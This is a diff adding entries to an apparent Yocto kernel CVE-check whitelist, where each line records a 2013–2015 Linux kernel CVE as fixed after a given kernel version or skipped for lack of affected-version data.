+# fixed-version: Fixed after version 3.12rc1
+CVE_CHECK_WHITELIST += "CVE-2013-2888"
+
+# fixed-version: Fixed after version 3.12rc2
+CVE_CHECK_WHITELIST += "CVE-2013-2889"
+
+# fixed-version: Fixed after version 3.12rc2
+CVE_CHECK_WHITELIST += "CVE-2013-2890"
+
+# fixed-version: Fixed after version 3.12rc2
+CVE_CHECK_WHITELIST += "CVE-2013-2891"
+
+# fixed-version: Fixed after version 3.12rc1
+CVE_CHECK_WHITELIST += "CVE-2013-2892"
+
+# fixed-version: Fixed after version 3.12rc2
+CVE_CHECK_WHITELIST += "CVE-2013-2893"
+
+# fixed-version: Fixed after version 3.12rc2
+CVE_CHECK_WHITELIST += "CVE-2013-2894"
+
+# fixed-version: Fixed after version 3.12rc2
+CVE_CHECK_WHITELIST += "CVE-2013-2895"
+
+# fixed-version: Fixed after version 3.12rc1
+CVE_CHECK_WHITELIST += "CVE-2013-2896"
+
+# fixed-version: Fixed after version 3.12rc2
+CVE_CHECK_WHITELIST += "CVE-2013-2897"
+
+# fixed-version: Fixed after version 3.12rc1
+CVE_CHECK_WHITELIST += "CVE-2013-2898"
+
+# fixed-version: Fixed after version 3.12rc1
+CVE_CHECK_WHITELIST += "CVE-2013-2899"
+
+# fixed-version: Fixed after version 3.13rc1
+CVE_CHECK_WHITELIST += "CVE-2013-2929"
+
+# fixed-version: Fixed after version 3.13rc1
+CVE_CHECK_WHITELIST += "CVE-2013-2930"
+
+# fixed-version: Fixed after version 3.9
+CVE_CHECK_WHITELIST += "CVE-2013-3076"
+
+# fixed-version: Fixed after version 3.9rc7
+CVE_CHECK_WHITELIST += "CVE-2013-3222"
+
+# fixed-version: Fixed after version 3.9rc7
+CVE_CHECK_WHITELIST += "CVE-2013-3223"
+
+# fixed-version: Fixed after version 3.9rc7
+CVE_CHECK_WHITELIST += "CVE-2013-3224"
+
+# fixed-version: Fixed after version 3.9rc7
+CVE_CHECK_WHITELIST += "CVE-2013-3225"
+
+# fixed-version: Fixed after version 3.9rc7
+CVE_CHECK_WHITELIST += "CVE-2013-3226"
+
+# fixed-version: Fixed after version 3.9rc7
+CVE_CHECK_WHITELIST += "CVE-2013-3227"
+
+# fixed-version: Fixed after version 3.9rc7
+CVE_CHECK_WHITELIST += "CVE-2013-3228"
+
+# fixed-version: Fixed after version 3.9rc7
+CVE_CHECK_WHITELIST += "CVE-2013-3229"
+
+# fixed-version: Fixed after version 3.9rc7
+CVE_CHECK_WHITELIST += "CVE-2013-3230"
+
+# fixed-version: Fixed after version 3.9rc7
+CVE_CHECK_WHITELIST += "CVE-2013-3231"
+
+# fixed-version: Fixed after version 3.9rc7
+CVE_CHECK_WHITELIST += "CVE-2013-3232"
+
+# fixed-version: Fixed after version 3.9rc7
+CVE_CHECK_WHITELIST += "CVE-2013-3233"
+
+# fixed-version: Fixed after version 3.9rc7
+CVE_CHECK_WHITELIST += "CVE-2013-3234"
+
+# fixed-version: Fixed after version 3.9rc7
+CVE_CHECK_WHITELIST += "CVE-2013-3235"
+
+# fixed-version: Fixed after version 3.9rc7
+CVE_CHECK_WHITELIST += "CVE-2013-3236"
+
+# fixed-version: Fixed after version 3.9rc7
+CVE_CHECK_WHITELIST += "CVE-2013-3237"
+
+# fixed-version: Fixed after version 3.9rc7
+CVE_CHECK_WHITELIST += "CVE-2013-3301"
+
+# fixed-version: Fixed after version 3.8rc3
+CVE_CHECK_WHITELIST += "CVE-2013-3302"
+
+# fixed-version: Fixed after version 3.11rc1
+CVE_CHECK_WHITELIST += "CVE-2013-4125"
+
+# fixed-version: Fixed after version 3.11rc1
+CVE_CHECK_WHITELIST += "CVE-2013-4127"
+
+# fixed-version: Fixed after version 3.11rc1
+CVE_CHECK_WHITELIST += "CVE-2013-4129"
+
+# fixed-version: Fixed after version 3.11rc1
+CVE_CHECK_WHITELIST += "CVE-2013-4162"
+
+# fixed-version: Fixed after version 3.11rc1
+CVE_CHECK_WHITELIST += "CVE-2013-4163"
+
+# fixed-version: Fixed after version 3.11rc5
+CVE_CHECK_WHITELIST += "CVE-2013-4205"
+
+# fixed-version: Fixed after version 3.10rc4
+CVE_CHECK_WHITELIST += "CVE-2013-4220"
+
+# fixed-version: Fixed after version 3.10rc5
+CVE_CHECK_WHITELIST += "CVE-2013-4247"
+
+# fixed-version: Fixed after version 3.11rc6
+CVE_CHECK_WHITELIST += "CVE-2013-4254"
+
+# fixed-version: Fixed after version 3.12rc4
+CVE_CHECK_WHITELIST += "CVE-2013-4270"
+
+# fixed-version: Fixed after version 3.12rc6
+CVE_CHECK_WHITELIST += "CVE-2013-4299"
+
+# fixed-version: Fixed after version 3.11
+CVE_CHECK_WHITELIST += "CVE-2013-4300"
+
+# fixed-version: Fixed after version 4.5rc1
+CVE_CHECK_WHITELIST += "CVE-2013-4312"
+
+# fixed-version: Fixed after version 3.12rc2
+CVE_CHECK_WHITELIST += "CVE-2013-4343"
+
+# fixed-version: Fixed after version 3.13rc2
+CVE_CHECK_WHITELIST += "CVE-2013-4345"
+
+# fixed-version: Fixed after version 3.13rc1
+CVE_CHECK_WHITELIST += "CVE-2013-4348"
+
+# fixed-version: Fixed after version 3.12rc2
+CVE_CHECK_WHITELIST += "CVE-2013-4350"
+
+# fixed-version: Fixed after version 3.12rc4
+CVE_CHECK_WHITELIST += "CVE-2013-4387"
+
+# fixed-version: Fixed after version 3.12rc7
+CVE_CHECK_WHITELIST += "CVE-2013-4470"
+
+# fixed-version: Fixed after version 3.10rc1
+CVE_CHECK_WHITELIST += "CVE-2013-4483"
+
+# fixed-version: Fixed after version 3.12
+CVE_CHECK_WHITELIST += "CVE-2013-4511"
+
+# fixed-version: Fixed after version 3.12
+CVE_CHECK_WHITELIST += "CVE-2013-4512"
+
+# fixed-version: Fixed after version 3.12
+CVE_CHECK_WHITELIST += "CVE-2013-4513"
+
+# fixed-version: Fixed after version 3.12
+CVE_CHECK_WHITELIST += "CVE-2013-4514"
+
+# fixed-version: Fixed after version 3.12
+CVE_CHECK_WHITELIST += "CVE-2013-4515"
+
+# fixed-version: Fixed after version 3.12
+CVE_CHECK_WHITELIST += "CVE-2013-4516"
+
+# fixed-version: Fixed after version 3.13rc1
+CVE_CHECK_WHITELIST += "CVE-2013-4563"
+
+# fixed-version: Fixed after version 3.13rc7
+CVE_CHECK_WHITELIST += "CVE-2013-4579"
+
+# fixed-version: Fixed after version 3.13rc4
+CVE_CHECK_WHITELIST += "CVE-2013-4587"
+
+# fixed-version: Fixed after version 2.6.33rc4
+CVE_CHECK_WHITELIST += "CVE-2013-4588"
+
+# fixed-version: Fixed after version 3.8rc1
+CVE_CHECK_WHITELIST += "CVE-2013-4591"
+
+# fixed-version: Fixed after version 3.7rc1
+CVE_CHECK_WHITELIST += "CVE-2013-4592"
+
+# Skipping CVE-2013-4737, no affected_versions
+
+# Skipping CVE-2013-4738, no affected_versions
+
+# Skipping CVE-2013-4739, no affected_versions
+
+# fixed-version: Fixed after version 3.10rc5
+CVE_CHECK_WHITELIST += "CVE-2013-5634"
+
+# fixed-version: Fixed after version 3.6rc6
+CVE_CHECK_WHITELIST += "CVE-2013-6282"
+
+# fixed-version: Fixed after version 3.13rc4
+CVE_CHECK_WHITELIST += "CVE-2013-6367"
+
+# fixed-version: Fixed after version 3.13rc4
+CVE_CHECK_WHITELIST += "CVE-2013-6368"
+
+# fixed-version: Fixed after version 3.13rc4
+CVE_CHECK_WHITELIST += "CVE-2013-6376"
+
+# fixed-version: Fixed after version 3.13rc1
+CVE_CHECK_WHITELIST += "CVE-2013-6378"
+
+# fixed-version: Fixed after version 3.13rc1
+CVE_CHECK_WHITELIST += "CVE-2013-6380"
+
+# fixed-version: Fixed after version 3.13rc1
+CVE_CHECK_WHITELIST += "CVE-2013-6381"
+
+# fixed-version: Fixed after version 3.13rc4
+CVE_CHECK_WHITELIST += "CVE-2013-6382"
+
+# fixed-version: Fixed after version 3.12
+CVE_CHECK_WHITELIST += "CVE-2013-6383"
+
+# Skipping CVE-2013-6392, no affected_versions
+
+# fixed-version: Fixed after version 3.12rc1
+CVE_CHECK_WHITELIST += "CVE-2013-6431"
+
+# fixed-version: Fixed after version 3.13rc1
+CVE_CHECK_WHITELIST += "CVE-2013-6432"
+
+# fixed-version: Fixed after version 3.14rc1
+CVE_CHECK_WHITELIST += "CVE-2013-6885"
+
+# fixed-version: Fixed after version 3.13rc1
+CVE_CHECK_WHITELIST += "CVE-2013-7026"
+
+# fixed-version: Fixed after version 3.12rc7
+CVE_CHECK_WHITELIST += "CVE-2013-7027"
+
+# fixed-version: Fixed after version 3.13rc1
+CVE_CHECK_WHITELIST += "CVE-2013-7263"
+
+# fixed-version: Fixed after version 3.13rc1
+CVE_CHECK_WHITELIST += "CVE-2013-7264"
+
+# fixed-version: Fixed after version 3.13rc1
+CVE_CHECK_WHITELIST += "CVE-2013-7265"
+
+# fixed-version: Fixed after version 3.13rc1
+CVE_CHECK_WHITELIST += "CVE-2013-7266"
+
+# fixed-version: Fixed after version 3.13rc1
+CVE_CHECK_WHITELIST += "CVE-2013-7267"
+
+# fixed-version: Fixed after version 3.13rc1
+CVE_CHECK_WHITELIST += "CVE-2013-7268"
+
+# fixed-version: Fixed after version 3.13rc1
+CVE_CHECK_WHITELIST += "CVE-2013-7269"
+
+# fixed-version: Fixed after version 3.13rc1
+CVE_CHECK_WHITELIST += "CVE-2013-7270"
+
+# fixed-version: Fixed after version 3.13rc1
+CVE_CHECK_WHITELIST += "CVE-2013-7271"
+
+# fixed-version: Fixed after version 3.13rc1
+CVE_CHECK_WHITELIST += "CVE-2013-7281"
+
+# fixed-version: Fixed after version 3.13rc7
+CVE_CHECK_WHITELIST += "CVE-2013-7339"
+
+# fixed-version: Fixed after version 3.13rc1
+CVE_CHECK_WHITELIST += "CVE-2013-7348"
+
+# fixed-version: Fixed after version 3.19rc1
+CVE_CHECK_WHITELIST += "CVE-2013-7421"
+
+# CVE-2013-7445 has no known resolution
+
+# fixed-version: Fixed after version 4.4rc4
+CVE_CHECK_WHITELIST += "CVE-2013-7446"
+
+# fixed-version: Fixed after version 3.12rc7
+CVE_CHECK_WHITELIST += "CVE-2013-7470"
+
+# fixed-version: Fixed after version 3.14rc1
+CVE_CHECK_WHITELIST += "CVE-2014-0038"
+
+# fixed-version: Fixed after version 3.14rc5
+CVE_CHECK_WHITELIST += "CVE-2014-0049"
+
+# fixed-version: Fixed after version 3.14
+CVE_CHECK_WHITELIST += "CVE-2014-0055"
+
+# fixed-version: Fixed after version 3.14rc4
+CVE_CHECK_WHITELIST += "CVE-2014-0069"
+
+# fixed-version: Fixed after version 3.14
+CVE_CHECK_WHITELIST += "CVE-2014-0077"
+
+# fixed-version: Fixed after version 3.14rc7
+CVE_CHECK_WHITELIST += "CVE-2014-0100"
+
+# fixed-version: Fixed after version 3.14rc6
+CVE_CHECK_WHITELIST += "CVE-2014-0101"
+
+# fixed-version: Fixed after version 3.14rc6
+CVE_CHECK_WHITELIST += "CVE-2014-0102"
+
+# fixed-version: Fixed after version 3.14rc7
+CVE_CHECK_WHITELIST += "CVE-2014-0131"
+
+# fixed-version: Fixed after version 3.15rc2
+CVE_CHECK_WHITELIST += "CVE-2014-0155"
+
+# fixed-version: Fixed after version 3.15rc5
+CVE_CHECK_WHITELIST += "CVE-2014-0181"
+
+# fixed-version: Fixed after version 3.15rc5
+CVE_CHECK_WHITELIST += "CVE-2014-0196"
+
+# fixed-version: Fixed after version 2.6.33rc5
+CVE_CHECK_WHITELIST += "CVE-2014-0203"
+
+# fixed-version: Fixed after version 2.6.37rc1
+CVE_CHECK_WHITELIST += "CVE-2014-0205"
+
+# fixed-version: Fixed after version 3.16rc3
+CVE_CHECK_WHITELIST += "CVE-2014-0206"
+
+# Skipping CVE-2014-0972, no affected_versions
+
+# fixed-version: Fixed after version 3.13
+CVE_CHECK_WHITELIST += "CVE-2014-1438"
+
+# fixed-version: Fixed after version 3.12rc7
+CVE_CHECK_WHITELIST += "CVE-2014-1444"
+
+# fixed-version: Fixed after version 3.12rc7
+CVE_CHECK_WHITELIST += "CVE-2014-1445"
+
+# fixed-version: Fixed after version 3.13rc7
+CVE_CHECK_WHITELIST += "CVE-2014-1446"
+
+# fixed-version: Fixed after version 3.13rc8
+CVE_CHECK_WHITELIST += "CVE-2014-1690"
+
+# fixed-version: Fixed after version 3.15rc5
+CVE_CHECK_WHITELIST += "CVE-2014-1737"
+
+# fixed-version: Fixed after version 3.15rc5
+CVE_CHECK_WHITELIST += "CVE-2014-1738"
+
+# fixed-version: Fixed after version 3.15rc6
+CVE_CHECK_WHITELIST += "CVE-2014-1739"
+
+# fixed-version: Fixed after version 3.14rc2
+CVE_CHECK_WHITELIST += "CVE-2014-1874"
+
+# fixed-version: Fixed after version 3.14rc1
+CVE_CHECK_WHITELIST += "CVE-2014-2038"
+
+# fixed-version: Fixed after version 3.14rc3
+CVE_CHECK_WHITELIST += "CVE-2014-2039"
+
+# fixed-version: Fixed after version 3.14rc7
+CVE_CHECK_WHITELIST += "CVE-2014-2309"
+
+# fixed-version: Fixed after version 3.14rc1
+CVE_CHECK_WHITELIST += "CVE-2014-2523"
+
+# fixed-version: Fixed after version 3.14
+CVE_CHECK_WHITELIST += "CVE-2014-2568"
+
+# fixed-version: Fixed after version 3.15rc1
+CVE_CHECK_WHITELIST += "CVE-2014-2580"
+
+# fixed-version: Fixed after version 3.14rc6
+CVE_CHECK_WHITELIST += "CVE-2014-2672"
+
+# fixed-version: Fixed after version 3.14rc6
+CVE_CHECK_WHITELIST += "CVE-2014-2673"
+
+# fixed-version: Fixed after version 3.15rc1
+CVE_CHECK_WHITELIST += "CVE-2014-2678"
+
+# fixed-version: Fixed after version 3.14rc6
+CVE_CHECK_WHITELIST += "CVE-2014-2706"
+
+# fixed-version: Fixed after version 3.15rc1
+CVE_CHECK_WHITELIST += "CVE-2014-2739"
+
+# fixed-version: Fixed after version 3.15rc2
+CVE_CHECK_WHITELIST += "CVE-2014-2851"
+
+# fixed-version: Fixed after version 3.2rc7
+CVE_CHECK_WHITELIST += "CVE-2014-2889"
+
+# fixed-version: Fixed after version 3.15rc1
+CVE_CHECK_WHITELIST += "CVE-2014-3122"
+
+# fixed-version: Fixed after version 3.15rc2
+CVE_CHECK_WHITELIST += "CVE-2014-3144"
+
+# fixed-version: Fixed after version 3.15rc2
+CVE_CHECK_WHITELIST += "CVE-2014-3145"
+
+# fixed-version: Fixed after version 3.15
+CVE_CHECK_WHITELIST += "CVE-2014-3153"
+
+# fixed-version: Fixed after version 3.17rc4
+CVE_CHECK_WHITELIST += "CVE-2014-3180"
+
+# fixed-version: Fixed after version 3.17rc3
+CVE_CHECK_WHITELIST += "CVE-2014-3181"
+
+# fixed-version: Fixed after version 3.17rc2
+CVE_CHECK_WHITELIST += "CVE-2014-3182"
+
+# fixed-version: Fixed after version 3.17rc2
+CVE_CHECK_WHITELIST += "CVE-2014-3183"
+
+# fixed-version: Fixed after version 3.17rc2
+CVE_CHECK_WHITELIST += "CVE-2014-3184"
+
+# fixed-version: Fixed after version 3.17rc3
+CVE_CHECK_WHITELIST += "CVE-2014-3185"
+
+# fixed-version: Fixed after version 3.17rc3
+CVE_CHECK_WHITELIST += "CVE-2014-3186"
+
+# Skipping CVE-2014-3519, no affected_versions
+
+# fixed-version: Fixed after version 3.16rc7
+CVE_CHECK_WHITELIST += "CVE-2014-3534"
+
+# fixed-version: Fixed after version 2.6.36rc1
+CVE_CHECK_WHITELIST += "CVE-2014-3535"
+
+# fixed-version: Fixed after version 3.17rc2
+CVE_CHECK_WHITELIST += "CVE-2014-3601"
+
+# fixed-version: Fixed after version 3.18rc2
+CVE_CHECK_WHITELIST += "CVE-2014-3610"
+
+# fixed-version: Fixed after version 3.18rc2
+CVE_CHECK_WHITELIST += "CVE-2014-3611"
+
+# fixed-version: Fixed after version 3.17rc5
+CVE_CHECK_WHITELIST += "CVE-2014-3631"
+
+# fixed-version: Fixed after version 3.12rc1
+CVE_CHECK_WHITELIST += "CVE-2014-3645"
+
+# fixed-version: Fixed after version 3.18rc2
+CVE_CHECK_WHITELIST += "CVE-2014-3646"
+
+# fixed-version: Fixed after version 3.18rc2
+CVE_CHECK_WHITELIST += "CVE-2014-3647"
+
+# fixed-version: Fixed after version 3.18rc1
+CVE_CHECK_WHITELIST += "CVE-2014-3673"
+
+# fixed-version: Fixed after version 3.18rc1
+CVE_CHECK_WHITELIST += "CVE-2014-3687"
+
+# fixed-version: Fixed after version 3.18rc1
+CVE_CHECK_WHITELIST += "CVE-2014-3688"
+
+# fixed-version: Fixed after version 3.18rc1
+CVE_CHECK_WHITELIST += "CVE-2014-3690"
+
+# fixed-version: Fixed after version 3.16rc1
+CVE_CHECK_WHITELIST += "CVE-2014-3917"
+
+# fixed-version: Fixed after version 3.15
+CVE_CHECK_WHITELIST += "CVE-2014-3940"
+
+# fixed-version: Fixed after version 3.16rc1
+CVE_CHECK_WHITELIST += "CVE-2014-4014"
+
+# fixed-version: Fixed after version 3.14rc1
+CVE_CHECK_WHITELIST += "CVE-2014-4027"
+
+# fixed-version: Fixed after version 3.15rc1
+CVE_CHECK_WHITELIST += "CVE-2014-4157"
+
+# fixed-version: Fixed after version 3.16rc3
+CVE_CHECK_WHITELIST += "CVE-2014-4171"
+
+# Skipping CVE-2014-4322, no affected_versions
+
+# Skipping CVE-2014-4323, no affected_versions
+
+# fixed-version: Fixed after version 3.16rc3
+CVE_CHECK_WHITELIST += "CVE-2014-4508"
+
+# fixed-version: Fixed after version 3.18rc1
+CVE_CHECK_WHITELIST += "CVE-2014-4608"
+
+# fixed-version: Fixed after version 3.16rc3
+CVE_CHECK_WHITELIST += "CVE-2014-4611"
+
+# fixed-version: Fixed after version 3.16rc2
+CVE_CHECK_WHITELIST += "CVE-2014-4652"
+
+# fixed-version: Fixed after version 3.16rc2
+CVE_CHECK_WHITELIST += "CVE-2014-4653"
+
+# fixed-version: Fixed after version 3.16rc2
+CVE_CHECK_WHITELIST += "CVE-2014-4654"
+
+# fixed-version: Fixed after version 3.16rc2
+CVE_CHECK_WHITELIST += "CVE-2014-4655"
+
+# fixed-version: Fixed after version 3.16rc2
+CVE_CHECK_WHITELIST += "CVE-2014-4656"
+
+# fixed-version: Fixed after version 3.16rc1
+CVE_CHECK_WHITELIST += "CVE-2014-4667"
+
+# fixed-version: Fixed after version 3.16rc4
+CVE_CHECK_WHITELIST += "CVE-2014-4699"
+
+# fixed-version: Fixed after version 3.16rc6
+CVE_CHECK_WHITELIST += "CVE-2014-4943"
+
+# fixed-version: Fixed after version 3.16rc7
+CVE_CHECK_WHITELIST += "CVE-2014-5045"
+
+# fixed-version: Fixed after version 3.16
+CVE_CHECK_WHITELIST += "CVE-2014-5077"
+
+# fixed-version: Fixed after version 3.17rc1
+CVE_CHECK_WHITELIST += "CVE-2014-5206"
+
+# fixed-version: Fixed after version 3.17rc1
+CVE_CHECK_WHITELIST += "CVE-2014-5207"
+
+# Skipping CVE-2014-5332, no affected_versions
+
+# fixed-version: Fixed after version 3.17rc2
+CVE_CHECK_WHITELIST += "CVE-2014-5471"
+
+# fixed-version: Fixed after version 3.17rc2
+CVE_CHECK_WHITELIST += "CVE-2014-5472"
+
+# fixed-version: Fixed after version 3.17rc5
+CVE_CHECK_WHITELIST += "CVE-2014-6410"
+
+# fixed-version: Fixed after version 3.17rc5
+CVE_CHECK_WHITELIST += "CVE-2014-6416"
+
+# fixed-version: Fixed after version 3.17rc5
+CVE_CHECK_WHITELIST += "CVE-2014-6417"
+
+# fixed-version: Fixed after version 3.17rc5
+CVE_CHECK_WHITELIST += "CVE-2014-6418"
+
+# fixed-version: Fixed after version 3.17rc2
+CVE_CHECK_WHITELIST += "CVE-2014-7145"
+
+# Skipping CVE-2014-7207, no affected_versions
+
+# fixed-version: Fixed after version 3.15rc1
+CVE_CHECK_WHITELIST += "CVE-2014-7283"
+
+# fixed-version: Fixed after version 3.15rc7
+CVE_CHECK_WHITELIST += "CVE-2014-7284"
+
+# fixed-version: Fixed after version 3.16rc1
+CVE_CHECK_WHITELIST += "CVE-2014-7822"
+
+# fixed-version: Fixed after version 3.18rc3
+CVE_CHECK_WHITELIST += "CVE-2014-7825"
+
+# fixed-version: Fixed after version 3.18rc3
+CVE_CHECK_WHITELIST += "CVE-2014-7826"
+
+# fixed-version: Fixed after version 3.18rc5
+CVE_CHECK_WHITELIST += "CVE-2014-7841"
+
+# fixed-version: Fixed after version 3.18rc1
+CVE_CHECK_WHITELIST += "CVE-2014-7842"
+
+# fixed-version: Fixed after version 3.18rc5
+CVE_CHECK_WHITELIST += "CVE-2014-7843"
+
+# fixed-version: Fixed after version 3.18rc1
+CVE_CHECK_WHITELIST += "CVE-2014-7970"
+
+# fixed-version: Fixed after version 3.18rc1
+CVE_CHECK_WHITELIST += "CVE-2014-7975"
+
+# fixed-version: Fixed after version 3.18rc3
+CVE_CHECK_WHITELIST += "CVE-2014-8086"
+
+# fixed-version: Fixed after version 3.19rc1
+CVE_CHECK_WHITELIST += "CVE-2014-8133"
+
+# fixed-version: Fixed after version 3.19rc1
+CVE_CHECK_WHITELIST += "CVE-2014-8134"
+
+# fixed-version: Fixed after version 4.0rc7
+CVE_CHECK_WHITELIST += "CVE-2014-8159"
+
+# fixed-version: Fixed after version 3.18rc1
+CVE_CHECK_WHITELIST += "CVE-2014-8160"
+
+# fixed-version: Fixed after version 3.12rc1
+CVE_CHECK_WHITELIST += "CVE-2014-8171"
+
+# fixed-version: Fixed after version 3.13rc1
+CVE_CHECK_WHITELIST += "CVE-2014-8172"
+
+# fixed-version: Fixed after version 3.13rc5
+CVE_CHECK_WHITELIST += "CVE-2014-8173"
+
+# Skipping CVE-2014-8181, no affected_versions
+
+# fixed-version: Fixed after version 3.18rc2
+CVE_CHECK_WHITELIST += "CVE-2014-8369"
+
+# fixed-version: Fixed after version 3.18rc2
+CVE_CHECK_WHITELIST += "CVE-2014-8480"
+
+# fixed-version: Fixed after version 3.18rc2
+CVE_CHECK_WHITELIST += "CVE-2014-8481"
+
+# fixed-version: Fixed after version 3.19rc1
+CVE_CHECK_WHITELIST += "CVE-2014-8559"
+
+# fixed-version: Fixed after version 3.14rc3
+CVE_CHECK_WHITELIST += "CVE-2014-8709"
+
+# fixed-version: Fixed after version 3.18rc1
+CVE_CHECK_WHITELIST += "CVE-2014-8884"
+
+# fixed-version: Fixed after version 3.19rc1
+CVE_CHECK_WHITELIST += "CVE-2014-8989"
+
+# fixed-version: Fixed after version 3.18rc6
+CVE_CHECK_WHITELIST += "CVE-2014-9090"
+
+# fixed-version: Fixed after version 3.18rc6
+CVE_CHECK_WHITELIST += "CVE-2014-9322"
+
+# fixed-version: Fixed after version 3.19rc1
+CVE_CHECK_WHITELIST += "CVE-2014-9419"
+
+# fixed-version: Fixed after version 3.19rc1
+CVE_CHECK_WHITELIST += "CVE-2014-9420"
+
+# fixed-version: Fixed after version 3.19rc3
+CVE_CHECK_WHITELIST += "CVE-2014-9428"
+
+# fixed-version: Fixed after version 3.19rc4
+CVE_CHECK_WHITELIST += "CVE-2014-9529"
+
+# fixed-version: Fixed after version 3.19rc3
+CVE_CHECK_WHITELIST += "CVE-2014-9584"
+
+# fixed-version: Fixed after version 3.19rc4
+CVE_CHECK_WHITELIST += "CVE-2014-9585"
+
+# fixed-version: Fixed after version 3.19rc1
+CVE_CHECK_WHITELIST += "CVE-2014-9644"
+
+# fixed-version: Fixed after version 3.19rc1
+CVE_CHECK_WHITELIST += "CVE-2014-9683"
+
+# fixed-version: Fixed after version 3.19rc1
+CVE_CHECK_WHITELIST += "CVE-2014-9710"
+
+# fixed-version: Fixed after version 3.15rc1
+CVE_CHECK_WHITELIST += "CVE-2014-9715"
+
+# fixed-version: Fixed after version 4.1rc1
+CVE_CHECK_WHITELIST += "CVE-2014-9717"
+
+# fixed-version: Fixed after version 3.19rc3
+CVE_CHECK_WHITELIST += "CVE-2014-9728"
+
+# fixed-version: Fixed after version 3.19rc3
+CVE_CHECK_WHITELIST += "CVE-2014-9729"
+
+# fixed-version: Fixed after version 3.19rc3
+CVE_CHECK_WHITELIST += "CVE-2014-9730"
+
+# fixed-version: Fixed after version 3.19rc3
+CVE_CHECK_WHITELIST += "CVE-2014-9731"
+
+# Skipping CVE-2014-9777, no affected_versions
+
+# Skipping CVE-2014-9778, no affected_versions
+
+# Skipping CVE-2014-9779, no affected_versions
+
+# Skipping CVE-2014-9780, no affected_versions
+
+# Skipping CVE-2014-9781, no affected_versions
+
+# Skipping CVE-2014-9782, no affected_versions
+
+# Skipping CVE-2014-9783, no affected_versions
+
+# Skipping CVE-2014-9784, no affected_versions
+
+# Skipping CVE-2014-9785, no affected_versions
+
+# Skipping CVE-2014-9786, no affected_versions
+
+# Skipping CVE-2014-9787, no affected_versions
+
+# Skipping CVE-2014-9788, no affected_versions
+
+# Skipping CVE-2014-9789, no affected_versions
+
+# fixed-version: Fixed after version 3.16rc1
+CVE_CHECK_WHITELIST += "CVE-2014-9803"
+
+# Skipping CVE-2014-9863, no affected_versions
+
+# Skipping CVE-2014-9864, no affected_versions
+
+# Skipping CVE-2014-9865, no affected_versions
+
+# Skipping CVE-2014-9866, no affected_versions
+
+# Skipping CVE-2014-9867, no affected_versions
+
+# Skipping CVE-2014-9868, no affected_versions
+
+# Skipping CVE-2014-9869, no affected_versions
+
+# fixed-version: Fixed after version 3.11rc1
+CVE_CHECK_WHITELIST += "CVE-2014-9870"
+
+# Skipping CVE-2014-9871, no affected_versions
+
+# Skipping CVE-2014-9872, no affected_versions
+
+# Skipping CVE-2014-9873, no affected_versions
+
+# Skipping CVE-2014-9874, no affected_versions
+
+# Skipping CVE-2014-9875, no affected_versions
+
+# Skipping CVE-2014-9876, no affected_versions
+
+# Skipping CVE-2014-9877, no affected_versions
+
+# Skipping CVE-2014-9878, no affected_versions
+
+# Skipping CVE-2014-9879, no affected_versions
+
+# Skipping CVE-2014-9880, no affected_versions
+
+# Skipping CVE-2014-9881, no affected_versions
+
+# Skipping CVE-2014-9882, no affected_versions
+
+# Skipping CVE-2014-9883, no affected_versions
+
+# Skipping CVE-2014-9884, no affected_versions
+
+# Skipping CVE-2014-9885, no affected_versions
+
+# Skipping CVE-2014-9886, no affected_versions
+
+# Skipping CVE-2014-9887, no affected_versions
+
+# fixed-version: Fixed after version 3.13rc1
+CVE_CHECK_WHITELIST += "CVE-2014-9888"
+
+# Skipping CVE-2014-9889, no affected_versions
+
+# Skipping CVE-2014-9890, no affected_versions
+
+# Skipping CVE-2014-9891, no affected_versions
+
+# Skipping CVE-2014-9892, no affected_versions
+
+# Skipping CVE-2014-9893, no affected_versions
+
+# Skipping CVE-2014-9894, no affected_versions
+
+# fixed-version: Fixed after version 3.11rc1
+CVE_CHECK_WHITELIST += "CVE-2014-9895"
+
+# Skipping CVE-2014-9896, no affected_versions
+
+# Skipping CVE-2014-9897, no affected_versions
+
+# Skipping CVE-2014-9898, no affected_versions
+
+# Skipping CVE-2014-9899, no affected_versions
+
+# Skipping CVE-2014-9900, no affected_versions
+
+# fixed-version: Fixed after version 3.14rc4
+CVE_CHECK_WHITELIST += "CVE-2014-9903"
+
+# fixed-version: Fixed after version 3.17rc1
+CVE_CHECK_WHITELIST += "CVE-2014-9904"
+
+# fixed-version: Fixed after version 3.16rc1
+CVE_CHECK_WHITELIST += "CVE-2014-9914"
+
+# fixed-version: Fixed after version 3.18rc2
+CVE_CHECK_WHITELIST += "CVE-2014-9922"
+
+# fixed-version: Fixed after version 3.19rc1
+CVE_CHECK_WHITELIST += "CVE-2014-9940"
+
+# fixed-version: Fixed after version 3.19rc6
+CVE_CHECK_WHITELIST += "CVE-2015-0239"
+
+# fixed-version: Fixed after version 3.15rc5
+CVE_CHECK_WHITELIST += "CVE-2015-0274"
+
+# fixed-version: Fixed after version 4.1rc1
+CVE_CHECK_WHITELIST += "CVE-2015-0275"
+
+# Skipping CVE-2015-0777, no affected_versions
+
+# Skipping CVE-2015-1328, no affected_versions
+
+# fixed-version: Fixed after version 4.2rc5
+CVE_CHECK_WHITELIST += "CVE-2015-1333"
+
+# fixed-version: Fixed after version 4.4rc5
+CVE_CHECK_WHITELIST += "CVE-2015-1339"
+
+# fixed-version: Fixed after version 4.9rc1
+CVE_CHECK_WHITELIST += "CVE-2015-1350"
+
+# fixed-version: Fixed after version 4.1rc7
+CVE_CHECK_WHITELIST += "CVE-2015-1420"
+
+# fixed-version: Fixed after version 3.19rc7
+CVE_CHECK_WHITELIST += "CVE-2015-1421"
+
+# fixed-version: Fixed after version 3.19rc7
+CVE_CHECK_WHITELIST += "CVE-2015-1465"
+
+# fixed-version: Fixed after version 3.19rc5
+CVE_CHECK_WHITELIST += "CVE-2015-1573"
+
+# fixed-version: Fixed after version 4.0rc1
+CVE_CHECK_WHITELIST += "CVE-2015-1593"
+
+# fixed-version: Fixed after version 3.16rc1
+CVE_CHECK_WHITELIST += "CVE-2015-1805"
+
+# fixed-version: Fixed after version 3.19rc7
+CVE_CHECK_WHITELIST += "CVE-2015-2041"
+
+# fixed-version: Fixed after version 3.19
+CVE_CHECK_WHITELIST += "CVE-2015-2042"
+
+# fixed-version: Fixed after version 4.0rc4
+CVE_CHECK_WHITELIST += "CVE-2015-2150"
+
+# fixed-version: Fixed after version 4.0rc1
+CVE_CHECK_WHITELIST += "CVE-2015-2666"
+
+# fixed-version: Fixed after version 4.0rc3
+CVE_CHECK_WHITELIST += "CVE-2015-2672"
+
+# fixed-version: Fixed after version 4.0rc6
+CVE_CHECK_WHITELIST += "CVE-2015-2686"
+
+# fixed-version: Fixed after version 4.0rc3
+CVE_CHECK_WHITELIST += "CVE-2015-2830"
+
+# CVE-2015-2877 has no known resolution
+
